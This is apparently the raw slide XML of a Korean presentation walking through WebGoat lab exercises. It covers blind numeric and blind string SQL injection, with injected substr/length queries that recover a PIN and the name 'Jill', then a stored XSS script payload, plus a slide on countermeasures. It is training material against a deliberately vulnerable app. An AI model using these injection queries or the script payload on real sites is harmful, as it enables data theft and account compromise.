              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2364 &lt;= pin &lt; 2365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>결국 이를 만족하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pin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2364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! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Webgoat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2364</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>값을 입력하면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5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804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1 : Stored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544522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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>프로필의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Streed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 수정하</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Jerry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에게도 공격의 영향을 줄 수 있다는 것을 증명하는 문제입니다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6" y="1412776"/>
            <a:ext cx="5797354" cy="40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7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Numeric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90977" y="2179279"/>
            <a:ext cx="324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Congratulations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 출력되며 정확한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값을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>구했다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>것을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Blind Numeric SQL Injection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Complete.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4" y="1642674"/>
            <a:ext cx="4848225" cy="365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6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20469" y="2564904"/>
            <a:ext cx="2541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Numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>과 비슷하지만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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>번 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>문제에서는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r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>구해야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우선 문자열의 길이를 파악하고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문자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>값을 이용하여</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>답</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>찾아야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보다 많은 과정이 필요할 것으</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>예상된다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9" y="1844824"/>
            <a:ext cx="564976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80355" y="1570187"/>
            <a:ext cx="3129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 and length(select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='4321432143214321')&gt;4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>;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입력했더니 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 출력되어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101 and length(select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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>')&gt;3;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>해봤더니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Account number is valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가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길이는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>3&lt; length &lt;= 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이므로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글자임을 알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5" y="1988840"/>
            <a:ext cx="535674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80355" y="1358382"/>
            <a:ext cx="3129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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘C';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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>첫글자를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 알아보고자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이름이므로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첫글자는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 대문자이므로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대문자와 비교해야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Account number is valid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err="1" smtClean="0"/>
              <a:t>떳으</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>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첫글자는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이후의 글자이다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8" y="1628800"/>
            <a:ext cx="4619625" cy="342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1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412776"/>
            <a:ext cx="88305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후 진행한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>질의문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQL : 101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘G';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Result : Account number is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL : 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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘J';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Result : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Invalid account number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL : 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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘H';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Result : Account number is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL : 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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘I';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Result : Account number is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>따라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>범위는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>보다 뒤면서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넘지 않는 값이므로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첫글자는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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>라는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 알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8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80355" y="1358382"/>
            <a:ext cx="3129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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),2,1)&gt;‘f';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글자를 알아보고자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두번쨰글자부터는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 소문자이므로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소문자와 비교한다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Account number is valid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err="1" smtClean="0"/>
              <a:t>떳으므</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>로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글자의 알파벳은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>보다 뒤의 글자이다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4" y="1792602"/>
            <a:ext cx="4933950" cy="343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0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412776"/>
            <a:ext cx="88305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후 진행한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>질의문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQL : 101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='4321432143214321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),2,1)&gt;‘h';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Result : Account number is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL : 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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘j';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Result : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Invalid account number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SQL : 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='4321432143214321'),1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)&gt;‘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';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Result : Invalid account number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범위는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>보다 뒤면서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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넘지 않는 값이므로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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>째</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>자리 글자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>라는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 알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9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80355" y="1358382"/>
            <a:ext cx="3129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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),3,1)&gt;‘k';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글자를 알아보고자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현재까지 나온 문자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Ji</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>일반적으</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Ji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 시작하는 가장 흔한 이름은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Jill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보다 큰지 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>한뒤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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>보다 큰지 확인해보려고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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>선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보다 크다는 것을 알 수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2" y="1700808"/>
            <a:ext cx="462915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6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80355" y="1358382"/>
            <a:ext cx="3129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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),3,1)&gt;‘l';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 입력했더니</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Invalid account number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떳다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세번쨰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 글자는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맞다는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 것이 증명되었다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현재까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>나온 글자는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Jil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아마도 마지막 글자도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일 가능성이 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검증해보도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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0" y="1628800"/>
            <a:ext cx="464820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7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80355" y="1358382"/>
            <a:ext cx="3129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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),4,1)&gt;‘k';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 입력했더니</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Account number is valid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떳다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네번쨰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 글자는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보다 뒤에 있는 알파벳이다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5" y="1628800"/>
            <a:ext cx="461962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1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804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1 : Stored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76056" y="227687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문제에서 주어진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Tom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>tom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tom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 계정으로 접속한 모습입니다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이후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 클릭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5" y="1700808"/>
            <a:ext cx="47339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2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80355" y="1358382"/>
            <a:ext cx="3129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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>((select name from pins where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='4321432143214321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'),4,1)&gt;‘l';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 입력했더니</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Invalid account number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떳다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>네</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>번쨰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 글자도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맞다는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 것이 증명되었다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최종적으로 완성된 답은</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Jill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2" y="1557115"/>
            <a:ext cx="4857750" cy="404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6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Blind String SQL Injection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80355" y="2060848"/>
            <a:ext cx="3129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최종적으</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>나온 답</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Jill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 입력했더니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Congratulations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>출력되었다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Blind String SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-K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5" y="1678412"/>
            <a:ext cx="4924425" cy="360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2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SQL Injection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원인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772816"/>
            <a:ext cx="88569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SQL Injection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이란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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>웹페이지의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 로그인 창 등에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SQL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구문을 넣어 개발자가 생각하</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>지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못한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SQL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문을 실행되게 함으로써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데이터베이스를 운영체제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OS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단계 명령을 할 수 있도록 하는 공격 방법이다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데이터 베이스를 연동한 어플리케이션의 증가와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웹 개발자들의 보안을 무시한 어플리케이션 코딩에 의해서 발생한다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84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SQL Injection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보안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대책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772816"/>
            <a:ext cx="885698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Validation Check :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파라미터의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Input Textbox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에 구문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Check</a:t>
            </a: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Stored Procedure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사용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SQL Query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의 노출을 최소화</a:t>
            </a:r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암호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화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DB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연결계정 정보 암호화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(ID/PW,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연결정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보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제한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된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DB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접근계정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DB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접근 계정을 제한</a:t>
            </a:r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Custom Error Page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사용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에러발생시 최소 페이지만 보여줌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty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Sysadmin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권한의 계정으로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DB Connection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을 하지 않는다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입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
                <a:ea typeface="Adobe 고딕 Std B" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>폼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등에서 특수문자나 예외문자에 대한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Replace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수행</a:t>
            </a:r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62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804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1 : Stored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92080" y="2323039"/>
            <a:ext cx="367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프로필에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>EditProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>입력가능한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 페이지가 나옵니다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문제에서 주어진 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Street Field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/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>'XSS Activated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>');&lt;/script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라는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코드를 넣고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취약점만 보여주면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>되기때문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UpdateProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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0125"/>
            <a:ext cx="511256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0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804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XSS LAB Stage 1 : Stored XSS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92080" y="2323039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로그아</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
